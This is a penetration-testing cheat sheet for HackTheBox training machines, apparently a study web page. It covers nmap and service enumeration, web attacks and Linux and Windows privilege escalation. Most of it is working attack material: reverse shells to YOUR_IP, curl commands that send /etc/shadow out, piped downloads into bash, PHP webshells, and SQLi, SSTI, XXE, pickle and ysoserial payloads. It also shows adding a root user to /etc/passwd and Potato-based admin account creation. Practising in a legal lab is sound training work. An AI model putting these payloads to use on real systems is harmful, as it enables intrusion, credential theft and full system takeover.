HackTheBox — Bulletproof Guide v4.0

▸Platform Overview

// what hackthebox is, how to get started, and how to think about the platform

🎯

The Goal

HTB hosts intentionally vulnerable machines. You connect via VPN, attack them legally, and capture two files: user.txt (low-priv foothold) and root.txt (full system compromise). Flags are 32-char MD5 hashes submitted to the platform for points.

🌐

VPN Connection

Download your .ovpn pack from Settings → VPN. Connect with openvpn --config htb.ovpn. Confirm with ip addr show tun0 — your HTB IP starts with 10.10.x.x. Never attack from your bare host OS.

🔥

Pwnbox

HTB's browser-based Kali VM. No local setup needed. Use it on shared networks or when you can't install tools. It resets between sessions, so save your notes externally.

📊

Difficulty Tiers

■ Easy — single vuln, guided path
■ Medium — chain 2–3 techniques
■ Hard — research + custom exploits
■ Insane — 0-day level thinking

📁

Folder Structure

Discipline from day one:

mkdir -p ~/htb/MachineName/{nmap,web,exploits,loot,creds}
cd ~/htb/MachineName

⚖️

Rules & Ethics

No flag sharing for Active machines. No DoS. No attacking other users. Retired machines have public writeups — use them to learn, never for active boxes. Bans are permanent.

The Attack Kill Chain

🔍

RECON

📋

ENUM

💥

EXPLOIT

🦶

FOOTHOLD

⬆️

PRIV ESC

🏴

FLAGS

📝

REPORT

▸Machine Progression Map

// recommended machines by difficulty — start here

Machine	Key Technique	What You Learn
Lame	Samba 3.0.20 RCE (CVE-2007-2447)	First Metasploit exploit, Linux enumeration
Blue	EternalBlue MS17-010	Classic Windows SMB exploit workflow
Jerry	Tomcat Manager default creds	Web service abuse, WAR file deployment
Nibbles	Nibbleblog RCE + sudo abuse	CMS enumeration → privesc chain
Shocker	Shellshock (CGI + bash)	Bash vulnerability, CGI exploitation
Bashed	webshell + sudo env abuse	Enumeration, PATH manipulation
Beep	LFI on Elastix + Shellshock	Multiple entry points, pivoting choices
Networked	PHP file upload bypass + cronjob	MIME bypass, root via cron script

Machine	Key Technique	What You Learn
Blue	EternalBlue (MS17-010)	SMB exploit, Metasploit basics
Jerry	Apache Tomcat default creds	App server abuse, msfvenom WAR
Legacy	MS08-067 / MS17-010	Old Windows XP exploitation
Devel	FTP + IIS RCE + MS11-046	Anon FTP upload, Windows token privesc
Optimum	HttpFileServer RCE	searchsploit workflow, Windows RE
Grandpa / Granny	IIS WebDAV exploit	Old IIS abuse, token impersonation

Machine	Key Technique	Difficulty
Valentine	Heartbleed + SSH key from memory	Medium
Poison	LFI → log poisoning → RCE	Medium
Sense	pfSense CVE + sudo	Medium
Mirai	Raspberry Pi default creds	Medium
Cronos	DNS zone transfer + SQLi + cronjob	Medium
Solidstate	James SMTP RCE + restricted shell escape	Medium

Machine	Key Technique	Difficulty
Forest	ASREPRoast + DCSync	Easy
Active	GPP password + Kerberoast	Easy
Sauna	ASREPRoast + AutoLogon creds	Easy
Resolute	Password spray + DnsAdmin abuse	Medium
Cascade	LDAP enum + legacy MSSQL + AD recycle bin	Medium
Intelligence	PDF metadata + ADIDNS + constrained delegation	Medium
Monteverde	Azure AD Connect password dump	Medium

▸Attack Methodology

// the repeatable process that works on every single machine

▸

Click any phase to expand its commands and techniques. Every box follows this loop — master the process and you can crack any machine.

01

Reconnaissance — Map the Target

Scan every port. Fingerprint every service. Miss nothing.

The golden nmap workflow:

# 1. Fast initial scan — common ports, version + default scripts

nmap -sV -sC -T4 -oN nmap/initial.txt 10.10.10.X

# 2. Full port sweep — never miss a high port

nmap -p- --min-rate 5000 -oN nmap/allports.txt 10.10.10.X

# 3. Deep scan on newly found ports (e.g. 8080,8443,3000)

nmap -sV -sC -p 8080,8443,3000 -oN nmap/deep.txt 10.10.10.X

# 4. UDP scan (slow — run in background)

nmap -sU --top-ports 100 -oN nmap/udp.txt 10.10.10.X

# 5. Vuln scripts

nmap --script vuln -p PORTS -oN nmap/vulns.txt 10.10.10.X

Key info to extract from results: open ports, exact service versions, OS fingerprint, SSL certificate CN (often a hostname), HTTP page titles, script output hints.

# Add hostname to /etc/hosts immediately

echo "10.10.10.X  machinename.htb" | sudo tee -a /etc/hosts

›

02

Enumeration — Extract Everything

Go deep on each service. One skipped detail is all it takes to stay stuck.

Web (80 / 443 / any HTTP):

# Tech fingerprint

whatweb http://10.10.10.X && curl -I http://10.10.10.X

# Directory brute-force

gobuster dir -u http://10.10.10.X -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt,bak,zip -o web/dirs.txt

# Fuzz with ffuf (faster, supports filters)

ffuf -u http://10.10.10.X/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc 200,301,302 -o web/ffuf.json

# VHost enumeration

ffuf -u http://10.10.10.X -H "Host: FUZZ.machinename.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs SIZE

SMB / NetBIOS:

smbclient -L //10.10.10.X -N

smbmap -H 10.10.10.X

enum4linux -a 10.10.10.X | tee enum4linux.txt

crackmapexec smb 10.10.10.X --shares -u '' -p ''

FTP:

ftp 10.10.10.X   # username: anonymous | password: (blank)

wget -r ftp://anonymous@10.10.10.X/  # download everything

DNS:

dig @10.10.10.X machinename.htb ANY

dig axfr @10.10.10.X machinename.htb  # zone transfer attempt

dnsrecon -r 10.10.10.0/24 -n 10.10.10.X

SNMP (UDP 161):

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.X

snmpwalk -c public -v1 10.10.10.X

›

03

Vulnerability Research — Find the Crack

Cross-reference service versions against known CVEs. Look for misconfigs too.

# Search local exploit DB
searchsploit apache 2.4.49
searchsploit -m 50383 # mirror exploit to current dir

# Search online resources
# → exploit-db.com, nvd.nist.gov, packetstormsecurity.com
# → GitHub: site:github.com CVE-YYYY-NNNNN PoC

# Check version against HackTricks
# → book.hacktricks.xyz/network-services-pentesting/

Ask yourself for each service: default creds? Known CVE? Misconfig (anon access, writable dirs, version disclosure)? Weak crypto? Logic flaws?

›

04

Exploitation — Get the Shell

Turn your research into a real foothold. Stability first.

# Always have a listener ready before triggering exploits

rlwrap nc -lvnp 4444

# If using Metasploit:

msfconsole -q

search type:exploit name:samba

use exploit/multi/samba/usermap_script

set RHOSTS 10.10.10.X && set LHOST tun0 && run

# Upgrade dumb shell immediately after catching it:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm && export SHELL=bash

# Ctrl+Z then:

stty raw -echo; fg

stty rows 45 cols 200

›

05

Post-Exploitation — Situational Awareness

Before escalating: understand where you are and what you have.

Linux:

# Who am I? Where am I?

id; whoami; hostname; ip a

# What OS and kernel?

uname -a; cat /etc/os-release

# What users exist?

cat /etc/passwd | grep -v nologin | grep -v false

# Grab user flag first

find / -name user.txt 2>/dev/null && cat /home/*/user.txt

# Look for credentials everywhere

grep -r "password" /var/www/ 2>/dev/null --include="*.php" --include="*.conf"

cat ~/.bash_history ~/.zsh_history 2>/dev/null

find / -name "*.conf" -o -name "*.config" -o -name "*.xml" 2>/dev/null | xargs grep -l "password" 2>/dev/null

# SSH keys and agent sockets

find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null

env | grep SSH_AUTH_SOCK   # hijack SSH agent if found

# Check open ports / internal services not exposed externally

ss -tlnp && netstat -tulnp 2>/dev/null

# Files modified recently (last 10 min — catch active scripts)

find / -type f -newer /etc/passwd -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null | head -30

# Interesting setuid scripts, world-writable files

find / -writable -type f 2>/dev/null | grep -v "/proc\|/sys\|/dev" | head -20

Windows:

# System and network info

systeminfo

whoami /all   # user, groups, AND privileges in one shot

net user && net localgroup administrators

ipconfig /all && route print

# Running processes and services

tasklist /v

Get-Process | Select Name,Id,Path | Sort Name

wmic service get name,displayname,pathname,startmode,state

# Credential hunting

cmdkey /list   # saved Windows credentials

dir /s /b *pass* *cred* *secret* *config* 2>nul

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

reg query HKLM /f password /t REG_SZ /s 2>nul | findstr /i "password"

# Find user flag

dir /s /b user.txt 2>nul

type C:\Users\*\Desktop\user.txt 2>nul

# Installed software

wmic product get name,version 2>nul

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion

›

06

Privilege Escalation — Become Root

The hardest and most satisfying part. See the dedicated PrivEsc tab.

Run automated scripts first, then manual enumeration:

# Transfer linPEAS to target (from your machine)

python3 -m http.server 8080

# On target:

curl http://YOUR_IP:8080/linpeas.sh | bash 2>&1 | tee /tmp/lpe.txt

# Quick manual checks (always run these)

sudo -l

find / -perm -4000 -type f 2>/dev/null

cat /etc/crontab && ls /etc/cron.d/

›

07

Capture Flags + Document

Grab both flags, submit, then write your notes while the box is fresh.

# Linux root flag

cat /root/root.txt

# Windows root flag (as SYSTEM/Administrator)

type C:\Users\Administrator\Desktop\root.txt

type C:\Users\Administrator\root.txt

# If you can't find it, search:

find / -name root.txt 2>/dev/null

dir /s root.txt 2>nul  (Windows)

After every machine: write a mini-writeup with your kill chain, what confused you, and what you'd do faster next time. This compounds into serious skill.

›

⚠

The #1 rule when stuck: You haven't enumerated enough. Before asking for hints, explicitly list every service you found, every endpoint you hit, every username you found. The answer is almost always in something you dismissed as unimportant.

▸Tools Arsenal

// every tool you need, when to use it, and the exact syntax

Tool	Use Case	Key Syntax
nmap	Port scan, version detect, script scan	`nmap -sV -sC -p- --min-rate 5000 IP`
masscan	Ultra-fast port sweep (use before nmap)	`masscan IP -p1-65535 --rate=5000`
enum4linux	SMB/Windows: users, shares, OS, groups	`enum4linux -a IP`
crackmapexec	SMB/LDAP/SSH mass enumeration + spray	`cme smb IP -u user -p pass --shares`
smbmap	SMB share permissions + file listing	`smbmap -H IP -u anonymous`
smbclient	Browse + download SMB shares	`smbclient //IP/share -U user%pass`
ldapsearch	LDAP enumeration (AD/LDAP services)	`ldapsearch -x -H ldap://IP -b "dc=x,dc=com"`
snmpwalk	SNMP enumeration (UDP 161)	`snmpwalk -c public -v2c IP`
dig	DNS queries + zone transfer attempts	`dig axfr @IP domain.htb`
nikto	Web server vuln scanner (noisy)	`nikto -h http://IP`
whatweb	Web tech fingerprinting	`whatweb http://IP`

Tool	Use Case	Key Syntax
gobuster	Web dir/file/vhost brute-force	`gobuster dir -u URL -w wordlist -x php,txt`
ffuf	Web fuzzer (fast, flexible filtering)	`ffuf -u URL/FUZZ -w wordlist -mc 200,301`
feroxbuster	Recursive web brute-force (better for deep dirs)	`feroxbuster -u URL -w wordlist`
Burp Suite	HTTP proxy, repeater, intruder, decoder	Set browser proxy to 127.0.0.1:8080
sqlmap	Automated SQL injection	`sqlmap -u "URL?id=1" --dbs --level 3`
wfuzz	Web fuzzer (good for parameter fuzzing)	`wfuzz -c -z file,wordlist URL/FUZZ`
curl	Manual HTTP requests, header inspection	`curl -v -X POST -d 'data' URL`
wpscan	WordPress enumeration + vuln scan	`wpscan --url URL --enumerate u,p,t`
droopescan	Drupal/Joomla/SilverStripe scanning	`droopescan scan drupal -u URL`

Key Wordlists

/usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt /usr/share/wordlists/rockyou.txt

Tool	Use Case	Key Syntax
Metasploit (msfconsole)	Framework with 2000+ modules	`search type:exploit name:X → use → set → run`
searchsploit	Offline ExploitDB search	`searchsploit service 1.2.3`
msfvenom	Payload/shellcode generator	`msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell`
netcat (nc)	Listen for reverse shells	`rlwrap nc -lvnp 4444`
pwncat-cs	Advanced reverse shell handler	`pwncat-cs -lp 4444`
chisel	TCP/UDP tunneling over HTTP	`chisel server -p 8000 --reverse`
ligolo-ng	Tunneling/pivoting (cleaner than chisel)	agent → proxy → add route
Impacket	AD/Windows protocol attacks suite	`python3 psexec.py domain/user:pass@IP`
evil-winrm	WinRM shells (Windows port 5985)	`evil-winrm -i IP -u user -p pass`
ssh	Shells, port forwarding, tunneling	`ssh -L localport:target:port user@hop`

Tool	OS	Purpose
linPEAS	Linux	Comprehensive automated Linux PrivEsc enumeration. Color-coded output by severity.
winPEAS	Windows	Automated Windows PrivEsc checks. `winPEASx64.exe quiet` for cleaner output.
LinEnum	Linux	Older alternative to linPEAS. Less noise on some systems.
linux-exploit-suggester	Linux	Suggests kernel exploits for the current kernel version.
wesng (WES-NG)	Windows	Windows Exploit Suggester - Next Generation. Feed it systeminfo output.
GTFOBins	Linux	Reference: gtfobins.github.io — sudo/SUID/capability abuse
LOLBAS	Windows	Reference: lolbas-project.github.io — Windows living-off-the-land
pspy	Linux	Monitor running processes without root. Catch cronjob scripts in real time.
PowerUp.ps1	Windows	PowerShell PrivEsc checks. Part of PowerSploit. `Invoke-AllChecks`.
SharpUp	Windows	C# port of PowerUp. Runs without PowerShell execution policy issues.

Tool	Hash Types	Key Syntax
hashcat	All types (GPU)	`hashcat -m MODE hash.txt rockyou.txt -r best64.rule`
john (JtR)	All types (CPU)	`john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt`
hash-identifier	—	Identify unknown hash format before cracking
haiti	—	Better hash identifier: `haiti 'hash'`
hydra	—	Online brute-force: `hydra -l user -P wordlist ssh://IP`
medusa	—	Alternative to hydra, better parallelism
ssh2john / zip2john	—	Convert file/key to hashcat/john crackable format

Common hashcat mode numbers

# Common hashcat -m values:

  MD5       100   SHA1      1400  SHA256

NTLM      1800  sha512crypt ($6$)   500   md5crypt ($1$)

DES/crypt 3200  bcrypt ($2*$)       13100 Kerberoast (TGS)

ASREPRoast (krb5asrep)  5600 NTLMv2  5500 NTLMv1

Linux Target — Getting Files On/Off

# Serve files from YOUR machine

python3 -m http.server 8080

python3 -m uploadserver 8080  # also handles POST uploads

# Download on TARGET (pick what's available)

wget http://YOUR_IP:8080/linpeas.sh -O /tmp/lpe.sh

curl http://YOUR_IP:8080/linpeas.sh -o /tmp/lpe.sh

curl http://YOUR_IP:8080/linpeas.sh | bash  # pipe directly

# Exfil from target back to you

curl -F "file=@/etc/shadow" http://YOUR_IP:8080/upload

nc YOUR_IP 9001 < /etc/shadow  # + nc -lvnp 9001 > shadow on your end

Windows Target — Getting Files On/Off

# PowerShell download (most reliable)

iwr http://YOUR_IP:8080/winpeas.exe -OutFile C:\Windows\Temp\wp.exe

Invoke-WebRequest http://YOUR_IP:8080/nc.exe -OutFile $env:TEMP\nc.exe

# certutil (old-school, usually available)

certutil -urlcache -split -f http://YOUR_IP:8080/shell.exe shell.exe

# SMB share (very reliable, no AV bypass needed)

impacket-smbserver share . -smb2support  # on YOUR machine

copy \\YOUR_IP\share\nc.exe .  # on Windows target

\\YOUR_IP\share\nc.exe -e cmd.exe YOUR_IP 4444  # run directly from UNC

▸Web Application Attacks

// the most common attack surface on HTB — master these cold

💉

SQL Injection (SQLi)

OWASP #3 ›

Inject SQL syntax into input fields, URL params, or request bodies. Test with ' — if the app errors or behaves differently, it's likely injectable.

# Manual detection payloads

'   ' OR '1'='1   ' OR '1'='1'--   '; SELECT sleep(5)--

# sqlmap — automated

sqlmap -u "http://target/page?id=1" --dbs

sqlmap -u "http://target/page?id=1" -D dbname -T users --dump

sqlmap -u "http://target/login" --data="user=admin&pass=x" --level 3 --risk 2

sqlmap -r request.txt --dbs  # use saved Burp request

# Get OS shell via sqlmap (if FILE priv)

sqlmap -u "URL?id=1" --os-shell

# Manual UNION-based extraction

' UNION SELECT 1,2,3--   # find column count

' UNION SELECT user(),database(),version()--

📂

Local File Inclusion (LFI) & Remote File Inclusion (RFI)

FILE INCLUSION ›

When an app includes files based on user input. LFI reads local files; RFI executes remote code.

# Basic LFI

http://target/page.php?file=../../../../etc/passwd

http://target/page.php?file=....//....//....//etc/passwd  # filter bypass

http://target/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

# Useful files to read

/etc/passwd      /etc/shadow      /root/.ssh/id_rsa

/var/www/html/config.php   /proc/self/environ

/var/log/apache2/access.log  # for log poisoning

# Log poisoning → RCE

# 1. Set User-Agent to PHP payload:

curl -A '<?php system($_GET["cmd"]); ?>' http://target/

# 2. Include the log and pass command:

?file=/var/log/apache2/access.log&cmd=id

# RFI (if allow_url_include=On)

?file=http://YOUR_IP:8080/shell.php

📤

File Upload Bypass

RCE VIA UPLOAD ›

# Simple webshell
<?php echo system($_GET['cmd']); ?>

# Bypass Content-Type check → change in Burp to image/jpeg
# Bypass extension blacklist → try .php5 .php7 .phtml .phar .shtml
# Bypass extension check → double ext: shell.php.jpg
# Bypass magic bytes check → prepend GIF magic bytes:
GIF89a;<?php system($_GET['cmd']); ?>

# Null byte injection (older PHP):
shell.php%00.jpg

# Find where uploaded file lands:
gobuster dir -u http://target/uploads -w wordlist
curl "http://target/uploads/shell.php?cmd=id"

⚡

Command Injection

OS RCE ›

# Test payloads — inject into ping fields, hostname lookups, etc.
127.0.0.1; id
127.0.0.1 | id
127.0.0.1 && id
127.0.0.1`id`
127.0.0.1$(id)

# Blind injection — use out-of-band (OOB) via DNS or HTTP
127.0.0.1; curl http://YOUR_IP:8080/$(whoami)
127.0.0.1; nslookup $(whoami).YOUR_BURP_COLLABORATOR

# Filter bypass (blocked semicolons/pipes)
127.0.0.1%0aid # URL encoded newline
127.0.0.1%26id # URL encoded &

🔄

Server-Side Request Forgery (SSRF)

INTERNAL ACCESS ›

Force the server to make requests on your behalf — to internal services, cloud metadata, or to read internal files.

# Basic SSRF test — does it fetch?
http://YOUR_IP:8080/test # watch your python server

# Access internal services
http://127.0.0.1:3000 http://localhost:8080/admin
http://192.168.1.1

# AWS/cloud metadata (huge on cloud boxes)
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Read local files via SSRF + gopher/file protocol
file:///etc/passwd
gopher://127.0.0.1:6379/_PING # attack Redis via SSRF

# Bypass localhost filters
http://0.0.0.0:80 http://[::]:80 http://0177.0.0.1

🔑

Broken Authentication & IDOR

LOGIC FLAWS ›

# IDOR — change object references to access other users' data

GET /api/profile?id=1337  →  try id=1, id=2, id=0, id=admin

# JWT manipulation

cat token.txt | cut -d'.' -f2 | base64 -d  # decode payload

# alg:none attack — set algorithm to none, forge claims

# HS256 → RS256 confusion attack

# Weak secret brute-force:

hashcat -m 16500 jwt.txt rockyou.txt

# Password reset flaws — intercept reset token, tamper

# Default credentials — always try admin:admin, admin:password

cat /usr/share/seclists/Passwords/Default-Credentials/default-passwords.csv

🧩

Template Injection (SSTI)

RCE ›

When user input is rendered inside a template engine (Jinja2, Twig, Freemarker). Test by injecting math expressions.

# Detection — inject math, see if result is evaluated

{{7*7}}  → 49   # Jinja2 / Twig

${7*7}  → 49   # FreeMarker / Velocity

#{7*7}  → 49   # Ruby ERB

# Jinja2 RCE (Python / Flask boxes)

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

# Twig RCE (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

🗄️

NoSQL Injection

MONGODB ›

# MongoDB login bypass (JSON body)

{"username": {"$ne": null}, "password": {"$ne": null}}

# URL parameter bypass

username[$ne]=xxx&password[$ne]=xxx

# Extract data with $regex

{"username": "admin", "password": {"$regex": "^a"}}  # blind extraction

💡

Use revshells.com to generate reverse shell payloads in any language. Use CyberChef for encoding/decoding payloads. Keep Burp Suite open for everything — even simple curl requests benefit from proxy interception.

📄

XML External Entity (XXE)

FILE READ / SSRF ›

When an app parses XML input and external entities are enabled. Can read local files, probe internal services (SSRF), or exfiltrate data out-of-band.

# Classic XXE — read /etc/passwd
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>

# Read any file
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa">
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">

# SSRF via XXE — probe internal services
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">

# Blind XXE — exfil via OOB DNS/HTTP (use Burp Collaborator)
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://BURP_COLLAB/?data=%file;'>">
%eval; &exfil;

# XXE in SVG / DOCX / XLSX (upload attack surface)
# Embed DOCTYPE in svg:image, or inject into word/document.xml

# Bypass XML filters — PHP base64 wrapper
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

🔗

GraphQL Exploitation

ENUM / IDOR / INJECTION ›

GraphQL APIs expose a self-documenting schema. Enumerate all types/queries first, then look for missing authorization, IDORs, and injection points in arguments.

# GraphQL introspection — dump entire schema
{"query":"{__schema{types{name,fields{name,args{name,type{name,kind,ofType{name,kind}}}}}}}}"}

# Find all queries and mutations
{"query":"{__schema{queryType{fields{name,description}}mutationType{fields{name,description}}}}"}

# If introspection blocked — try field suggestions
{"query":"{__type(name:\"User\"){fields{name}}}"}

# Probe for IDOR — change user id
{"query":"{user(id:2){email,password,isAdmin}}"}

# GraphQL injection in arguments
{"query":"{user(username:\"admin' OR '1'='1\"){password}}"}

# Batch queries (bypass rate limiting)
[{"query":"{login(user:\"admin\",pass:\"pass1\")}"},{"query":"{login(user:\"admin\",pass:\"pass2\")}"}]

# Tools: graphw00f (fingerprint), InQL (Burp plugin), clairvoyance (blind enum)

💣

Deserialization Attacks

RCE ›

When apps deserialize untrusted data without validation. Affects Java, PHP, Python, Ruby, .NET. Often delivers direct RCE. Look for base64 blobs in cookies, parameters, or request bodies.

# PHP deserialization — identify with: O:4:"User":2:{...}

# Find gadget chains with phpggc

phpggc Laravel/RCE1 system "id" | base64 -w0

phpggc Guzzle/FW1 /var/www/html/shell.php '<?php system($_GET["cmd"]); ?>'

# Java deserialization — look for rO0 (base64 of \xac\xed)

echo "rO0..." | base64 -d | xxd | head  # confirms Java serialized object

# Generate payload with ysoserial:

java -jar ysoserial.jar CommonsCollections6 'curl http://YOUR_IP:8080/shell.sh | bash' | base64 -w0

# Python pickle RCE

import pickle, os

class Exploit(object):

    def __reduce__(self): return (os.system, ('bash -c "bash -i >& /dev/tcp/IP/4444 0>&1"',))

import base64; print(base64.b64encode(pickle.dumps(Exploit())).decode())

# .NET ViewState deserialization — ysoserial.net

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -enc BASE64" --path="/page.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="KEY" --validationalg="SHA1" --validationkey="KEY"

🚦

HTTP Request Smuggling

ADVANCED / CL.TE / TE.CL ›

Exploit discrepancies between how a front-end and back-end server parse HTTP request boundaries. Can bypass security controls, poison caches, hijack requests, and gain access to internal endpoints.

# CL.TE — front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

# TE.CL — front-end uses Transfer-Encoding, back-end uses Content-Length
POST / HTTP/1.1
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

# Detect with timing — send request designed to time out back-end
# Use Burp Suite → HTTP Request Smuggler extension for automation
# Practice: PortSwigger Web Security Academy has excellent labs

# HTTP/2 downgrade smuggling (H2.CL / H2.TE)
# When front-end is HTTP/2 but back-end is HTTP/1.1
# Inject Content-Length header via HTTP/2 pseudo-headers

🔐

OAuth 2.0 & OpenID Attacks

AUTH BYPASS / ACCOUNT TAKEOVER ›

# 1. CSRF on OAuth — missing state parameter
# Drop state= from authorization URL, intercept callback
https://provider.com/auth?client_id=X&redirect_uri=https://target.com/callback&response_type=code
# No &state=RANDOM → CSRF possible → victim's token attached to attacker account

# 2. Redirect URI manipulation
redirect_uri=https://target.com/callback/../../../attacker.com
redirect_uri=https://attacker.com%2F@target.com/callback
redirect_uri=https://target.com.attacker.com/callback

# 3. Implicit flow token leakage
# response_type=token → access token in URL fragment → Referer leakage

# 4. JWT "alg:none" — remove signature entirely
python3 -c " import base64, json header = base64.b64encode(json.dumps({'alg':'none','typ':'JWT'}).encode()).decode().rstrip('=') payload = base64.b64encode(json.dumps({'user':'admin','admin':True}).encode()).decode().rstrip('=') print(f'{header}.{payload}.') "

# 5. JWT weak secret brute-force
hashcat -m 16500 jwt_token.txt /usr/share/wordlists/rockyou.txt

▸Privilege Escalation

// from user to root/SYSTEM — every technique that shows up on HTB

▸

sudo -l Abuse

The first thing you check. If you can run ANY command as root without a password, you can escalate. Visit GTFOBins for every binary.

sudo -l
# Common hits:
sudo vim -c ':!/bin/bash'
sudo find . -exec /bin/bash \; -quit
sudo python3 -c 'import os; os.execl("/bin/bash","bash")'
sudo less /etc/passwd → !bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo env /bin/bash
# Script allowed: read the script, find a writable dependency, hijack it

▸

SUID Binaries

Binaries with the SUID bit run as their owner (often root). Check GTFOBins for exploitation paths.

find / -perm -4000 -type f 2>/dev/null

# Suspicious: find, vim, python, bash, cp, nmap, pkexec

# bash with SUID:

bash -p

# find with SUID:

find . -exec /bin/sh -p \; -quit

# Custom SUID binary? Run strings on it, look for system() calls

strings /usr/sbin/custombinary | grep -E "system|exec|/bin"

▸

Cronjob Hijacking

If a root cronjob runs a script you can write to, or uses relative paths, inject your payload.

# Find all cron jobs

cat /etc/crontab; ls -la /etc/cron*; crontab -l

# Watch processes to catch non-crontab crons:

./pspy64

# If script is writable, add reverse shell:

echo 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' >> /path/to/script.sh

# PATH hijacking — if cron calls binary without full path:

echo '#!/bin/bash\nbash -i >& /dev/tcp/YOUR_IP/4444 0>&1' > /tmp/binary_name

chmod +x /tmp/binary_name

# Wait for cron to run with /tmp in PATH

▸

Capabilities

Linux capabilities grant specific root powers to binaries. Dangerous ones include cap_setuid and cap_net_bind_service.

getcap -r / 2>/dev/null

# If python3 has cap_setuid+ep:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# If perl has cap_setuid+ep:

perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash"'

▸

Writable /etc/passwd

ls -la /etc/passwd

# Generate password:

openssl passwd -1 -salt h4x h4xpassword

# Add root user:

echo 'h4x:$1$h4x$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd

su h4x

▸

NFS No-Root-Squash

If an NFS share has no_root_squash, files created by root on your machine appear as root on target.

cat /etc/exports  # look for no_root_squash

# On YOUR machine (as root):

mount -t nfs 10.10.10.X:/shared /mnt/htb

cp /bin/bash /mnt/htb/rootbash && chmod +s /mnt/htb/rootbash

# On target:

/shared/rootbash -p

▸

Shared Library Hijacking

If a SUID binary loads a shared library from a writable path, replace the library.

ldd /usr/sbin/vulnerable_binary

# If a library path is writable:

cat /etc/ld.so.conf.d/*  # check lib search paths

# Compile malicious library:

cat > /tmp/evil.c <<EOF

#include <stdlib.h>

void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); }

EOF

gcc -shared -fPIC /tmp/evil.c -o /writable/path/libvuln.so.1

▸

SeImpersonatePrivilege — Potato Attacks

Most common Windows PrivEsc. Service accounts often have this privilege. Use GodPotato (most modern), PrintSpoofer, or JuicyPotato depending on OS.

whoami /priv  # look for SeImpersonatePrivilege: Enabled

# GodPotato (works on Win 2012-2022 + Win 8-11)

.\GodPotato.exe -cmd "cmd /c net user hax Pass1! /add && net localgroup administrators hax /add"

.\GodPotato.exe -cmd "cmd /c C:\Windows\Temp\nc.exe YOUR_IP 4444 -e cmd.exe"

# PrintSpoofer (Server 2019 / Win 10)

.\PrintSpoofer.exe -i -c cmd

# JuicyPotato (older systems - check CLSID list for OS)

.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c shell.exe" -t * -c {CLSID}

▸

AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Both must be 0x1 to be exploitable

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi -o evil.msi

msiexec /quiet /qn /i C:\Windows\Temp\evil.msi

▸

Unquoted Service Paths

wmic service get name,pathname | findstr /v /i "C:\Windows\\" | findstr /v """

# Find writable directory in the path:

icacls "C:\Program Files\Vulnerable App"

# Place payload at the hijackable location

▸

Stored Credentials

# Windows credential manager

cmdkey /list

runas /savecred /user:admin "cmd.exe /c nc.exe YOUR_IP 4444 -e cmd.exe"

# SAM + SYSTEM dump (offline)

reg save HKLM\SAM C:\Windows\Temp\SAM

reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM

# Then on your machine:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# AutoLogon credentials in registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# PowerShell history

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

▸

Weak Service Permissions

# Check service permissions

accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul

accesschk.exe -ucqv VulnService /accepteula

# If you can change binPath:

sc config VulnService binPath= "cmd /c net user hax Pass1! /add"

sc stop VulnService && sc start VulnService

⚠

Kernel exploits are often the wrong path on HTB. They're used as a last resort when other vectors are exhausted. Crashing the machine with a bad kernel exploit is bad form on shared instances.

CVE	Name	Affected	Notes
CVE-2021-4034	PwnKit	Linux (pkexec)	Very reliable, almost universal on older HTB Linux boxes
CVE-2021-3156	Baron Samedit	sudo < 1.9.5p2	Heap overflow in sudo, works on major distros
